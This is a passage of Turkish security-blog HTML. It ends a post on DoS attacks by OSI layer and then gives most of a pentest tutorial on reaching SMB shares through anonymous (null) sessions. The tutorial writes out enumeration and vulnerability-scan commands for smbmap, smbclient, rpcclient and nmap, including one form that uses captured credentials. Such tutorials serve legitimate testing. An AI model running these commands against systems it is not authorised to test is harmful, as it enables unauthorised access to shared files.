sürdürülmesi ve nasıl gerçekleştirileceğine karar verilmesi gibi kurallardır.
Ayrıca bu katmanda gerçekleştirilen işlemlerin büyük kısmı ağ arayüz kartı
içerisinde gerçekleştirilir. Bu katmanda gerçekleştirilebilecek saldırılara MAC
Flood saldırısı örnek gösterilebilir. Bu saldırılar sonucunda ise kullanıcı
kaynağından hedefine giden veri akışının bozulması ihtimali vardır.</span><span style="background: white; font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal;">
<br /></div>
<div class="MsoNormal" style="line-height: normal;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><i><span style="background: white; font-size: 12pt;">1. Katman için DoS ve DDoS</span></i></b><b><i><span style="background: white; font-size: 12pt;"><o:p></o:p></span></i></b></span></div>
<span style="background: white; font-size: 12pt; line-height: 107%;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Bu katmanda verilerin fiziksel cihazlar üzerinden
sinyal olarak gönderilmesi ve alınması sağlanır. 100Base – T & 1000Base – X
gibi protokoller kullanılır. Bu katmanda direkt olarak fiziksel saldırılar
yapılır. Bu saldırılar sonucunda fiziksel varlıklar yeniden ayarlanamaz yahut
kullanılamaz hale gelebilir. Bu saldırılara, ağ kablolarına ve donanımlara
zarar vermek, frekans bozumu (jamming) saldırısı örnek gösterilebilir.</span></span><br />
<span style="background: white; font-size: 12pt; line-height: 107%;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">DOS ve DDOS hizmetini de içeren <a href="http://btyon.com.tr/sizma-testi.php" target="_blank">sızma testi</a> ( <a href="http://www.btyon.com.tr/penetrasyon-testi.php" target="_blank">Penetrasyon testi</a>) hizmetlerimiz hakkında detaylı bilgi almak için <a href="http://www.btyon.com.tr/pentest.php" target="_blank">tıklayınız</a>. </span></span></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="background: white; font-size: 12pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<b><span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">KAYNAK<o:p></o:p></span></span></b></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<b><span style="background: white; font-size: 12pt; letter-spacing: 0.3pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></b></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 10pt;">https://www.cloudflare.com/learning/ddos/layer-3-ddos-attacks/</span><span style="background: white; font-size: 10pt; letter-spacing: 0.3pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 10pt;">https://tr.wikipedia.org/wiki/Denial-of-service_attack</span><span style="font-size: 10pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="background: white; font-size: 12pt;"><span style="font-family: "arial" , "helvetica" , sans-serif;">
</span></span></div>
<div class="MsoNormal" style="line-height: normal; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: 10pt;">https://hostnoc.com/ddos-vulnerabilities-on-separate-layers-of-the-osi-model-how-to-mitigate-them/</span><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: 10pt;"><o:p></o:p></span></span></div>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-34780323887985583092020-03-13T09:34:00.001+03:002020-03-31T16:01:24.327+03:00SMB Anonim Oturumla Nasıl Sömürülür?<br />
<div class="MsoNormal" style="text-align: justify;">
<h2 style="text-align: center;">
<span style="font-size: 18pt; text-align: justify;"><b> </b> </span><b style="text-align: justify;"><span style="font-size: x-small;">Tuğcan Özel, Sızma Testi Uzmanı</span></b></h2>
<span style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;"></span></span><br />
<div style="text-align: left;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 25.68px;">SMB Nedir?</span></b></div>
<div style="text-align: left;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 25.68px;"><br /></span></b></div>
</div>
<div class="MsoNormal" style="text-align: justify;">
Server Message Block (Sunucu İleti Bloğu), sunucu istemci (server-client) arasındaki iletişimi sağlayan bir ağ protokolüdür. SMB protokolü, Windows sistemlerinin 139 ve 445 portlarını kullanarak, paylaşılan dosyalara erişimi, ağlar, yazıcılar ve çeşitli bağlantıları sağlar. Bu bağlantıların yanında oplock, dosya ve kayıt kitleme, dosya ve dizin değişikliği gibi işlemler de SMB üzerinden gerçekleşmektedir.<br />
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-tvjgFd43b5E/Xmsmy8wi_XI/AAAAAAAAAAM/eazV1iLVn6o3whfYuRngcf5b0badYu1AgCLcBGAsYHQ/s1600/img00001.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="165" data-original-width="317" src="https://1.bp.blogspot.com/-tvjgFd43b5E/Xmsmy8wi_XI/AAAAAAAAAAM/eazV1iLVn6o3whfYuRngcf5b0badYu1AgCLcBGAsYHQ/s1600/img00001.gif" /></a></div>
<a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span id="goog_1771481707"></span><span id="goog_1771481708"></span><br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">Kullanılan
Araçlar</span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b><b><span lang="TR" style="line-height: 107%;">Nmblookup</span></b><span lang="TR" style="line-height: 107%;"> – TCP/IP üzerinden
NetBIOS isimleri hakkında bilgi toplamaktadır.<br /><o:p></o:p></span><b><span lang="TR" style="line-height: 107%;">Smbclient</span></b><span lang="TR" style="line-height: 107%;"> – FTP protokolü gibi SMB
paylaşımlarına erişmeye yaramaktadır.<br /><o:p></o:p></span><b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> – Host üzerindeki
paylaşıma açık dosyaları ve izinlerini göstermektedir.<br /><o:p></o:p></span><b><span lang="TR" style="line-height: 107%;">Nmap</span></b><span lang="TR" style="line-height: 107%;"> – Scriptleri ile genel
bir tarayıcıdır.<br /><o:p></o:p></span><b><span lang="TR" style="line-height: 107%;">Rpcclient</span></b><span lang="TR" style="line-height: 107%;"> – Kullanıcı tarafındaki
MS-RPC fonksiyonlarını çalıştırmaya yaramaktadır.<br /><o:p></o:p></span><b><span lang="TR" style="line-height: 107%;">Enum4Linux</span></b><span lang="TR" style="line-height: 107%;"> – Çeşitli SMB
fonksiyonlar<span style="font-size: 12pt;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">Host İsimleri Hakkında
Bilgi Toplama<span style="font-size: 18pt;"><o:p></o:p></span></span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<b><span lang="TR" style="line-height: 107%;">Nmblookup</span></b><span lang="TR" style="line-height: 107%;"> – A [IP]<br /><o:p></o:p></span><span lang="TR" style="line-height: 107%;">- A parametresi, IP
adresine göre bilgi toplamamıza izin vermektedir. </span><br />
<span lang="TR" style="line-height: 107%;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-E9n6ZRYpOSo/XmsnBnQnbbI/AAAAAAAAAAQ/r5cpQ638DO8YJ30-cVw-WHgyKxM03zUygCLcBGAsYHQ/s1600/Capture.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="323" data-original-width="1196" height="171" src="https://1.bp.blogspot.com/-E9n6ZRYpOSo/XmsnBnQnbbI/AAAAAAAAAAQ/r5cpQ638DO8YJ30-cVw-WHgyKxM03zUygCLcBGAsYHQ/s640/Capture.PNG" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">Dizin Listeleme<o:p></o:p></span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<br />
<b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> –H [ip/hostname]</span><br />
-H parametre host
ismi veya ip adresimi belirtmemizi istemektedir.</div>
<div class="MsoNormal" style="text-align: justify;">
<span style="line-height: 107%;"><!--[if gte vml 1]><v:shape
id="_x0000_i1031" type="#_x0000_t75" style='width:468pt;height:147.6pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image005.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="line-height: 107%;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-C5fK4SETTI0/XmsoJjvzQRI/AAAAAAAAAAg/1N6Hf_9l8RkWzSCYs2LuToGNc8IIkDs7ACLcBGAsYHQ/s1600/Capture1.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="348" data-original-width="1207" height="184" src="https://1.bp.blogspot.com/-C5fK4SETTI0/XmsoJjvzQRI/AAAAAAAAAAg/1N6Hf_9l8RkWzSCYs2LuToGNc8IIkDs7ACLcBGAsYHQ/s640/Capture1.PNG" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="line-height: 107%;">Eğer kimlik bilgileri ele geçirilirse, erişim sağlanması
için aracımız şu şekilde kullanılabilmektedir.<o:p></o:p></span><br />
<span lang="TR" style="line-height: 107%;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify; text-indent: .5in;">
<b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> –H [ip] –d [domain] –u
[user] –p [password]<o:p></o:p></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ouTJKUOTR_w/XmsoYBKpE5I/AAAAAAAAAAk/OxaLmPP3tXELwzSqTUjlR4OhR6x3QZ0FwCLcBGAsYHQ/s1600/Capture2.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="340" data-original-width="1171" height="185" src="https://1.bp.blogspot.com/-ouTJKUOTR_w/XmsoYBKpE5I/AAAAAAAAAAk/OxaLmPP3tXELwzSqTUjlR4OhR6x3QZ0FwCLcBGAsYHQ/s640/Capture2.PNG" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 16.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape id="_x0000_i1030" type="#_x0000_t75"
style='width:468pt;height:165.6pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image007.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="font-size: 16.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify; text-indent: .5in;">
<b><span lang="TR" style="line-height: 107%;">Smbclient</span></b><span lang="TR" style="line-height: 107%;"> –L \\[ip]<br /><o:p></o:p></span><span lang="TR" style="line-height: 107%;"> -L parametresi ilgili
hosttaki dizinleri getirmektedir.</span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 16.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape id="_x0000_i1029" type="#_x0000_t75"
style='width:468pt;height:196.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image009.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="font-size: 16.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-f_QR_SsH2qk/XmsoidUZHAI/AAAAAAAAAAs/KQmSef_5WpQjhjhtKUfYMXNQ5M2tu3x0ACLcBGAsYHQ/s1600/Capture3.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="487" data-original-width="1183" height="262" src="https://1.bp.blogspot.com/-f_QR_SsH2qk/XmsoidUZHAI/AAAAAAAAAAs/KQmSef_5WpQjhjhtKUfYMXNQ5M2tu3x0ACLcBGAsYHQ/s640/Capture3.PNG" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="text-align: justify; text-indent: .5in;">
<b><span lang="TR" style="line-height: 107%;">Nmap</span></b><span lang="TR" style="line-height: 107%;"> <span style="mso-spacerun: yes;"> </span>--script –smb-enum-shares –p 139,445 [ip]</span><br />
<span lang="TR" style="line-height: 107%;"><o:p></o:p></span><span lang="TR" style="line-height: 107%;">-script smb-enum-shares ->
smb hakkında bilgi toplamak için çalıştırılan bir scripttir.</span><br />
<span lang="TR" style="line-height: 107%;"><br /></span><span lang="TR" style="line-height: 107%;"> -p 139,445 ilgili
portları belirtmektedir.</span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify; text-indent: .5in;">
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 16.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape id="_x0000_i1028" type="#_x0000_t75"
style='width:468pt;height:234.6pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image011.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="font-size: 16.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<div class="separator" style="clear: both; text-align: left;">
<a href="https://1.bp.blogspot.com/-PKJv5IGAD5w/XmsovXIt9FI/AAAAAAAAAA0/BWXLYwq6VtA77KwPxjiLP7nncvxul_IJACLcBGAsYHQ/s1600/Capture4.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="849" data-original-width="798" height="640" src="https://1.bp.blogspot.com/-PKJv5IGAD5w/XmsovXIt9FI/AAAAAAAAAA0/BWXLYwq6VtA77KwPxjiLP7nncvxul_IJACLcBGAsYHQ/s640/Capture4.PNG" width="600" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<b><span lang="TR" style="line-height: 107%;">Smbmap</span></b><span lang="TR" style="line-height: 107%;"> –H [ip/hostname] belirli
kimlik bilgileri ile veya null oturum ile dizinlerde neler gerçekleştirilebileceği
hakkında bilgi vermektedir.<br /><o:p></o:p></span><span lang="TR" style="line-height: 107%;"><b>Rpcclient </b>–U “” –N [ip]</span><br />
<span lang="TR" style="line-height: 107%;"><br /></span><span lang="TR" style="line-height: 107%;">-U “” null oturumlar
anlamına gelmektedir.</span><br />
<span lang="TR" style="line-height: 107%;"><br /></span><span lang="TR" style="line-height: 107%;">-N parola yok anlamına
gelmektedir.(No password)</span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify; text-indent: .5in;">
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-FxOMv3W8kIk/Xmso2dVYYSI/AAAAAAAAAA8/4N_lfaiNzaQIgWIrl8bKMmt4mEs6WOjLgCLcBGAsYHQ/s1600/Capture5.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="65" data-original-width="1124" height="35" src="https://1.bp.blogspot.com/-FxOMv3W8kIk/Xmso2dVYYSI/AAAAAAAAAA8/4N_lfaiNzaQIgWIrl8bKMmt4mEs6WOjLgCLcBGAsYHQ/s640/Capture5.PNG" width="640" /></a></div>
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: 16.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape id="_x0000_i1027" type="#_x0000_t75"
style='width:468pt;height:27pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image013.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="font-size: 16.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span lang="TR" style="line-height: 107%;">Bu noktadan itibaren rpc komutları
çalıştırılabilmektedir.</span><br />
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span>
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">NULL Oturum
Kontrolü</span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;"><br /></span></b><b><span lang="TR" style="line-height: 107%;">Smbclient</span></b><span lang="TR" style="line-height: 107%;"> //[ip]/[dizin_adı]
şeklinde host üzerindeki dizine kimlik bilgileri yollanmadan erişilmeye
çalışılmaktadır. Erişim sağlanırsa NULL session meydana gelmektedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CSedwRmVLjU/XmspErZowXI/AAAAAAAAABE/19y0phiGDt03khGVk9d3GN-Y3mLYf67KwCLcBGAsYHQ/s1600/Capture6.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="318" data-original-width="1196" height="168" src="https://1.bp.blogspot.com/-CSedwRmVLjU/XmspErZowXI/AAAAAAAAABE/19y0phiGDt03khGVk9d3GN-Y3mLYf67KwCLcBGAsYHQ/s640/Capture6.PNG" width="640" /></a></div>
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 16.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape id="_x0000_i1026" type="#_x0000_t75"
style='width:468pt;height:124.2pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image015.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><span lang="TR" style="font-size: 16.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">Zafiyet Kontrolü<o:p></o:p></span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<b><span lang="TR" style="line-height: 107%;">Nmap</span></b><span lang="TR" style="line-height: 107%;"> –script smb-vuln* -p
139,445 [ip]<br /><o:p></o:p></span><br />
<span lang="TR" style="line-height: 107%;">--script smb-vuln* smb
zafiyetleri ile ilgili bünyesinde barındırdığı tüm scriptleri çalıştıracaktır.</span><br />
<span lang="TR" style="line-height: 107%;"><br /></span><span lang="TR" style="line-height: 107%;">-p 139,445 smb portları</span></div>
<div class="MsoNormal" style="margin-left: 1.0in; text-align: justify;">
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://1.bp.blogspot.com/-hogmGKoSM5Y/XmspMblw2hI/AAAAAAAAABM/79cqwnNcVXg73G9KywweWcN7tW_8awcXgCLcBGAsYHQ/s1600/Capture7.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="789" data-original-width="806" height="624" src="https://1.bp.blogspot.com/-hogmGKoSM5Y/XmspMblw2hI/AAAAAAAAABM/79cqwnNcVXg73G9KywweWcN7tW_8awcXgCLcBGAsYHQ/s640/Capture7.PNG" width="640" /></a></div>
<span lang="TR" style="font-size: 12.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 24.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-no-proof: yes;"><!--[if gte vml 1]><v:shape
id="Picture_x0020_4" o:spid="_x0000_i1025" type="#_x0000_t75" style='width:468pt;
height:197.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\TUGCAN~1.LOC\AppData\Local\Temp\msohtmlclip1\01\clip_image017.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></b><b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 24.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="font-size: 18.0pt; line-height: 107%; mso-ansi-language: TR; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></b>
<br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;">GENEL TARAMA<o:p></o:p></span></b><br />
<b style="mso-bidi-font-weight: normal;"><span lang="TR" style="line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: .5in; text-align: justify;">
<a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2815426134653926766" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 